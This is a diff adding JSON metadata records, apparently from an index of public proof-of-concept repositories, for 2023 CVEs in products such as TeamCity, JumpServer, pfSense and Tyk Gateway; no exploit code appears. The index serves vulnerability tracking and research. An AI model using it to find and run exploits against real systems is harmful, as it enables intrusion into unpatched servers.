-0,0 +1,33 @@ +[ + { + "id": 712086997, + "name": "CVE-2023-42283", + "full_name": "andreysanyuk\/CVE-2023-42283", + "owner": { + "login": "andreysanyuk", + "id": 18166102, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18166102?v=4", + "html_url": "https:\/\/github.com\/andreysanyuk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andreysanyuk\/CVE-2023-42283", + "description": "Proof of concept for CVE-2023-42283 in Tyk Gateway", + "fork": false, + "created_at": "2023-10-30T19:05:41Z", + "updated_at": "2023-11-06T11:47:11Z", + "pushed_at": "2023-10-30T19:29:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42284.json b/2023/CVE-2023-42284.json new file mode 100644 index 0000000000..7d38049bc4 --- /dev/null +++ b/2023/CVE-2023-42284.json @@ -0,0 +1,33 @@ +[ + { + "id": 712094141, + "name": "CVE-2023-42284", + "full_name": "andreysanyuk\/CVE-2023-42284", + "owner": { + "login": "andreysanyuk", + "id": 18166102, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18166102?v=4", + "html_url": "https:\/\/github.com\/andreysanyuk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andreysanyuk\/CVE-2023-42284", + "description": " Proof of concept for CVE-2023-42284 in Tyk Gateway ", + "fork": false, + "created_at": "2023-10-30T19:24:48Z", + "updated_at": "2023-11-06T11:46:29Z", + "pushed_at": "2023-10-30T19:27:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42326.json b/2023/CVE-2023-42326.json new file mode 100644 index 0000000000..efdf5314e1 --- /dev/null +++ b/2023/CVE-2023-42326.json @@ -0,0 +1,64 @@ +[ + { + "id": 877667291, + "name": "CVE-2023-42326", + "full_name": "bl4ckarch\/CVE-2023-42326", + "owner": { + "login": "bl4ckarch", + "id": 62140530, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62140530?v=4", + "html_url": "https:\/\/github.com\/bl4ckarch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bl4ckarch\/CVE-2023-42326", + "description": "This is a simple POC to for show the pfsense 2.7 Command injection Vulnerability ( CVE-2023-42326)", + "fork": false, + "created_at": "2024-10-24T03:15:30Z", + "updated_at": "2024-11-05T10:00:20Z", + "pushed_at": "2024-11-05T10:00:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 881528395, + "name": "CVE-2023-42326", + "full_name": "Farzan-Kh\/CVE-2023-42326", + "owner": { + "login": "Farzan-Kh", + "id": 65416059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65416059?v=4", + "html_url": "https:\/\/github.com\/Farzan-Kh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Farzan-Kh\/CVE-2023-42326", + "description": "CVE-2023-42326 exploit", + "fork": false, + "created_at": "2024-10-31T18:51:54Z", + "updated_at": "2024-11-01T08:57:04Z", + "pushed_at": "2024-11-01T08:57:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42362.json b/2023/CVE-2023-42362.json new file mode 100644 index 0000000000..c0262de208 --- /dev/null +++ b/2023/CVE-2023-42362.json @@ -0,0 +1,33 @@ +[ + { + "id": 690513360, + "name": "CVE-2023-42362", + "full_name": "Mr-n0b3dy\/CVE-2023-42362", + "owner": { + "login": "Mr-n0b3dy", + "id": 144795381, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144795381?v=4", + "html_url": "https:\/\/github.com\/Mr-n0b3dy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-n0b3dy\/CVE-2023-42362", + "description": null, + "fork": false, + "created_at": "2023-09-12T10:46:12Z", + "updated_at": "2023-09-13T12:17:19Z", + "pushed_at": "2023-09-13T22:38:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42413.json b/2023/CVE-2023-42413.json new file mode 100644 index 0000000000..d75f727a99 --- /dev/null +++ b/2023/CVE-2023-42413.json @@ -0,0 +1,33 @@ +[ + { + "id": 695761286, + "name": "cve-2023-42413", + "full_name": "chenghao-hao\/cve-2023-42413", + "owner": { + "login": "chenghao-hao", + "id": 73655831, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73655831?v=4", + "html_url": "https:\/\/github.com\/chenghao-hao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chenghao-hao\/cve-2023-42413", + "description": "ecology_9_sql ", + "fork": false, + "created_at": "2023-09-24T06:17:33Z", + "updated_at": "2023-09-24T06:17:34Z", + "pushed_at": "2023-09-24T06:17:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42426.json b/2023/CVE-2023-42426.json new file mode 100644 index 0000000000..c99606b06c --- /dev/null +++ b/2023/CVE-2023-42426.json @@ -0,0 +1,33 @@ +[ + { + "id": 695777958, + "name": "CVE-2023-42426", + "full_name": "b0marek\/CVE-2023-42426", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-42426", + "description": "Repository for CVE-2023-42426 vulnerability. ", + "fork": false, + "created_at": "2023-09-24T07:34:05Z", + "updated_at": "2023-09-24T07:53:46Z", + "pushed_at": "2023-09-24T07:59:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42442.json b/2023/CVE-2023-42442.json new file mode 100644 index 0000000000..d8faa682d4 --- /dev/null +++ b/2023/CVE-2023-42442.json @@ -0,0 +1,99 @@ +[ + { + "id": 697118433, + "name": "CVE-2023-42442", + "full_name": "HolyGu\/CVE-2023-42442", + "owner": { + "login": "HolyGu", + "id": 28488437, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28488437?v=4", + "html_url": "https:\/\/github.com\/HolyGu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HolyGu\/CVE-2023-42442", + "description": null, + "fork": false, + "created_at": "2023-09-27T05:09:20Z", + "updated_at": "2024-11-16T19:50:51Z", + "pushed_at": "2023-10-12T05:03:19Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 41, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 704850042, + "name": "blackjump", + "full_name": "tarihub\/blackjump", + "owner": { + "login": "tarihub", + "id": 39155974, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39155974?v=4", + "html_url": "https:\/\/github.com\/tarihub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tarihub\/blackjump", + "description": "JumpServer 堡垒机未授权综合漏洞利用, Exploit for CVE-2023-42442 \/ CVE-2023-42820 \/ RCE 2021", + "fork": false, + "created_at": "2023-10-14T09:35:07Z", + "updated_at": "2024-11-27T03:12:13Z", + "pushed_at": "2024-05-16T07:42:00Z", + "stargazers_count": 221, + "watchers_count": 221, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-42442", + "cve-2023-42820", + "jumpserver" + ], + "visibility": "public", + "forks": 23, + "watchers": 221, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 707591805, + "name": "CVE-2023-42442", + "full_name": "C1ph3rX13\/CVE-2023-42442", + "owner": { + "login": "C1ph3rX13", + "id": 80873500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4", + "html_url": "https:\/\/github.com\/C1ph3rX13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-42442", + "description": "CVE-2023-42442 JumpServer Session 录像任意下载漏洞", + "fork": false, + "created_at": "2023-10-20T08:33:17Z", + "updated_at": "2024-08-28T02:59:06Z", + "pushed_at": "2023-10-31T06:18:21Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42468.json b/2023/CVE-2023-42468.json new file mode 100644 index 0000000000..8877d2149f --- /dev/null +++ b/2023/CVE-2023-42468.json @@ -0,0 +1,35 @@ +[ + { + "id": 686365585, + "name": "com.cutestudio.colordialer", + "full_name": "actuator\/com.cutestudio.colordialer", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.cutestudio.colordialer", + "description": "CVE-2023-42468", + "fork": false, + "created_at": "2023-09-02T14:48:07Z", + "updated_at": "2023-09-11T21:00:49Z", + "pushed_at": "2023-12-27T01:05:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-42468" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42469.json b/2023/CVE-2023-42469.json new file mode 100644 index 0000000000..19f06a643c --- /dev/null +++ b/2023/CVE-2023-42469.json @@ -0,0 +1,33 @@ +[ + { + "id": 686403164, + "name": "com.full.dialer.top.secure.encrypted", + "full_name": "actuator\/com.full.dialer.top.secure.encrypted", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.full.dialer.top.secure.encrypted", + "description": "CVE-2023-42469", + "fork": false, + "created_at": "2023-09-02T17:11:58Z", + "updated_at": "2023-09-11T20:59:02Z", + "pushed_at": "2023-12-26T22:35:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42470.json b/2023/CVE-2023-42470.json new file mode 100644 index 0000000000..8bc522cfdd --- /dev/null +++ b/2023/CVE-2023-42470.json @@ -0,0 +1,36 @@ +[ + { + "id": 679505307, + "name": "imou", + "full_name": "actuator\/imou", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/imou", + "description": "CVE-2023-42470 | CVE-2023-47353", + "fork": false, + "created_at": "2023-08-17T02:12:24Z", + "updated_at": "2024-08-20T13:25:00Z", + "pushed_at": "2024-08-20T13:24:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-42470", + "cve-2023-47353" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42471.json b/2023/CVE-2023-42471.json new file mode 100644 index 0000000000..aa478c1e64 --- /dev/null +++ b/2023/CVE-2023-42471.json @@ -0,0 +1,33 @@ +[ + { + "id": 683940293, + "name": "wave.ai.browser", + "full_name": "actuator\/wave.ai.browser", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/wave.ai.browser", + "description": "CVE-2023-42471", + "fork": false, + "created_at": "2023-08-28T05:34:04Z", + "updated_at": "2023-09-11T20:59:38Z", + "pushed_at": "2023-11-14T14:45:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4278.json b/2023/CVE-2023-4278.json new file mode 100644 index 0000000000..659c162ba7 --- /dev/null +++ b/2023/CVE-2023-4278.json @@ -0,0 +1,33 @@ +[ + { + "id": 687060459, + "name": "CVE-2023-4278", + "full_name": "revan-ar\/CVE-2023-4278", + "owner": { + "login": "revan-ar", + "id": 45234012, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45234012?v=4", + "html_url": "https:\/\/github.com\/revan-ar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/revan-ar\/CVE-2023-4278", + "description": "Wordpress Plugin Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation.", + "fork": false, + "created_at": "2023-09-04T14:16:32Z", + "updated_at": "2024-03-21T15:02:13Z", + "pushed_at": "2023-09-04T17:01:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42789.json b/2023/CVE-2023-42789.json new file mode 100644 index 0000000000..1bddd7edd1 --- /dev/null +++ b/2023/CVE-2023-42789.json @@ -0,0 +1,33 @@ +[ + { + "id": 778714358, + "name": "CVE-2023-42789", + "full_name": "jhonnybonny\/CVE-2023-42789", + "owner": { + "login": "jhonnybonny", + "id": 87495218, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87495218?v=4", + "html_url": "https:\/\/github.com\/jhonnybonny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jhonnybonny\/CVE-2023-42789", + "description": "Check CVE-2023-42789 ", + "fork": false, + "created_at": "2024-03-28T08:59:12Z", + "updated_at": "2024-03-28T09:03:10Z", + "pushed_at": "2024-03-28T09:10:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4279.json b/2023/CVE-2023-4279.json new file mode 100644 index 0000000000..b8d7bcf42b --- /dev/null +++ b/2023/CVE-2023-4279.json @@ -0,0 +1,33 @@ +[ + { + "id": 695790223, + "name": "CVE-2023-4279", + "full_name": "b0marek\/CVE-2023-4279", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-4279", + "description": "Repository for CVE-2023-4279 vulnerability. ", + "fork": false, + "created_at": "2023-09-24T08:26:37Z", + "updated_at": "2023-09-24T08:26:37Z", + "pushed_at": "2023-09-24T08:35:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42793.json b/2023/CVE-2023-42793.json new file mode 100644 index 0000000000..b8e0310e86 --- /dev/null +++ b/2023/CVE-2023-42793.json @@ -0,0 +1,358 @@ +[ + { + "id": 698097705, + "name": "CVE-2023-42793", + "full_name": "H454NSec\/CVE-2023-42793", + "owner": { + "login": "H454NSec", + "id": 127287794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127287794?v=4", + "html_url": "https:\/\/github.com\/H454NSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H454NSec\/CVE-2023-42793", + "description": "JetBrains TeamCity Authentication Bypass CVE-2023-42793 Exploit", + "fork": false, + "created_at": "2023-09-29T06:43:35Z", + "updated_at": "2024-10-27T21:40:54Z", + "pushed_at": "2024-05-22T16:07:18Z", + "stargazers_count": 45, + "watchers_count": 45, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-42793", + "exploit", + "poc", + "teamcity" + ], + "visibility": "public", + "forks": 14, + "watchers": 45, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 700903844, + "name": "CVE-2023-42793", + "full_name": "whoamins\/CVE-2023-42793", + "owner": { + "login": "whoamins", + "id": 66217512, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66217512?v=4", + "html_url": "https:\/\/github.com\/whoamins", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whoamins\/CVE-2023-42793", + "description": null, + "fork": false, + "created_at": "2023-10-05T14:17:35Z", + "updated_at": "2024-09-20T09:34:58Z", + "pushed_at": "2023-10-23T20:42:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 701008513, + "name": "CVE-2023-42793", + "full_name": "Zenmovie\/CVE-2023-42793", + "owner": { + "login": "Zenmovie", + "id": 98185655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98185655?v=4", + "html_url": "https:\/\/github.com\/Zenmovie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zenmovie\/CVE-2023-42793", + "description": "PoC of CVE-2023-42793", + "fork": false, + "created_at": "2023-10-05T18:12:25Z", + "updated_at": "2024-10-30T06:55:54Z", + "pushed_at": "2023-10-11T11:40:05Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 740232498, + "name": "CVE-2023-42793_POC", + "full_name": "johnossawy\/CVE-2023-42793_POC", + "owner": { + "login": "johnossawy", + "id": 78561981, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78561981?v=4", + "html_url": "https:\/\/github.com\/johnossawy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/johnossawy\/CVE-2023-42793_POC", + "description": null, + "fork": false, + "created_at": "2024-01-07T22:29:18Z", + "updated_at": "2024-01-08T18:21:55Z", + "pushed_at": "2024-01-08T18:21:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 743548847, + "name": "GhostTown", + "full_name": "StanleyJobsonAU\/GhostTown", + "owner": { + "login": "StanleyJobsonAU", + "id": 123927299, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123927299?v=4", + "html_url": "https:\/\/github.com\/StanleyJobsonAU", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/StanleyJobsonAU\/GhostTown", + "description": "Proof of Concept script to exploit CVE-2023-42793 (TeamCity)", + "fork": false, + "created_at": "2024-01-15T13:25:49Z", + "updated_at": "2024-02-25T06:43:21Z", + "pushed_at": "2024-01-15T13:26:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789764349, + "name": "CVE-2023-42793", + "full_name": "hotplugin0x01\/CVE-2023-42793", + "owner": { + "login": "hotplugin0x01", + "id": 57496383, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57496383?v=4", + "html_url": "https:\/\/github.com\/hotplugin0x01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hotplugin0x01\/CVE-2023-42793", + "description": "JetBrains TeamCity Unauthenticated Remote Code Execution - Python3 Implementation", + "fork": false, + "created_at": "2024-04-21T13:52:28Z", + "updated_at": "2024-05-06T10:15:51Z", + "pushed_at": "2024-05-06T10:15:48Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 791394288, + "name": "CVE-2023-42793", + "full_name": "Zyad-Elsayed\/CVE-2023-42793", + "owner": { + "login": "Zyad-Elsayed", + "id": 52281871, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52281871?v=4", + "html_url": "https:\/\/github.com\/Zyad-Elsayed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zyad-Elsayed\/CVE-2023-42793", + "description": "JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE), CVE-2023-42793", + "fork": false, + "created_at": "2024-04-24T16:33:20Z", + "updated_at": "2024-11-06T08:40:37Z", + "pushed_at": "2024-04-24T23:10:27Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-42793", + "exploit", + "htb", + "jetbrains", + "poc", + "rce", + "runner", + "shell", + "teamcity" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 806358142, + "name": "CVE-2023-42793", + "full_name": "junnythemarksman\/CVE-2023-42793", + "owner": { + "login": "junnythemarksman", + "id": 20056452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20056452?v=4", + "html_url": "https:\/\/github.com\/junnythemarksman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/junnythemarksman\/CVE-2023-42793", + "description": "TeamCity CVE-2023-42793 exploit written in Rust", + "fork": false, + "created_at": "2024-05-27T03:31:57Z", + "updated_at": "2024-05-27T05:38:39Z", + "pushed_at": "2024-05-27T05:38:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824689719, + "name": "CVE-2023-42793", + "full_name": "HusenjanDev\/CVE-2023-42793", + "owner": { + "login": "HusenjanDev", + "id": 88688451, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88688451?v=4", + "html_url": "https:\/\/github.com\/HusenjanDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HusenjanDev\/CVE-2023-42793", + "description": "TeamCity RCE for Linux (CVE-2023-42793)", + "fork": false, + "created_at": "2024-07-05T17:39:25Z", + "updated_at": "2024-11-20T16:30:53Z", + "pushed_at": "2024-07-05T17:48:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 847041001, + "name": "CVE-2023-42793", + "full_name": "FlojBoj\/CVE-2023-42793", + "owner": { + "login": "FlojBoj", + "id": 170850781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170850781?v=4", + "html_url": "https:\/\/github.com\/FlojBoj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FlojBoj\/CVE-2023-42793", + "description": "TeamCity CVE-2023-42793 RCE (Remote Code Execution)", + "fork": false, + "created_at": "2024-08-24T17:17:21Z", + "updated_at": "2024-08-25T20:58:50Z", + "pushed_at": "2024-08-25T20:58:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 860426530, + "name": "teamcity-exploit-cve-2023-42793", + "full_name": "SwiftSecur\/teamcity-exploit-cve-2023-42793", + "owner": { + "login": "SwiftSecur", + "id": 177733389, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/177733389?v=4", + "html_url": "https:\/\/github.com\/SwiftSecur", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SwiftSecur\/teamcity-exploit-cve-2023-42793", + "description": "teamcity-exploit-cve-2023-42793", + "fork": false, + "created_at": "2024-09-20T12:15:25Z", + "updated_at": "2024-11-06T14:05:38Z", + "pushed_at": "2024-11-06T14:05:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4281.json b/2023/CVE-2023-4281.json new file mode 100644 index 0000000000..d9d740203b --- /dev/null +++ b/2023/CVE-2023-4281.json @@ -0,0 +1,33 @@ +[ + { + "id": 695848699, + "name": "CVE-2023-4281", + "full_name": "b0marek\/CVE-2023-4281", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-4281", + "description": "Repository for CVE-2023-4281 vulnerability. ", + "fork": false, + "created_at": "2023-09-24T12:21:19Z", + "updated_at": "2023-09-24T12:21:19Z", + "pushed_at": "2023-09-24T12:27:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42819.json b/2023/CVE-2023-42819.json new file mode 100644 index 0000000000..8eb777e800 --- /dev/null +++ b/2023/CVE-2023-42819.json @@ -0,0 +1,33 @@ +[ + { + "id": 703955293, + "name": "CVE-2023-42819", + "full_name": "C1ph3rX13\/CVE-2023-42819", + "owner": { + "login": "C1ph3rX13", + "id": 80873500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4", + "html_url": "https:\/\/github.com\/C1ph3rX13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-42819", + "description": "CVE-2023-42819", + "fork": false, + "created_at": "2023-10-12T08:45:46Z", + "updated_at": "2024-07-31T07:23:36Z", + "pushed_at": "2023-12-28T07:05:46Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42820.json b/2023/CVE-2023-42820.json new file mode 100644 index 0000000000..97d30b7aa6 --- /dev/null +++ b/2023/CVE-2023-42820.json @@ -0,0 +1,64 @@ +[ + { + "id": 702854511, + "name": "CVE-2023-42820", + "full_name": "C1ph3rX13\/CVE-2023-42820", + "owner": { + "login": 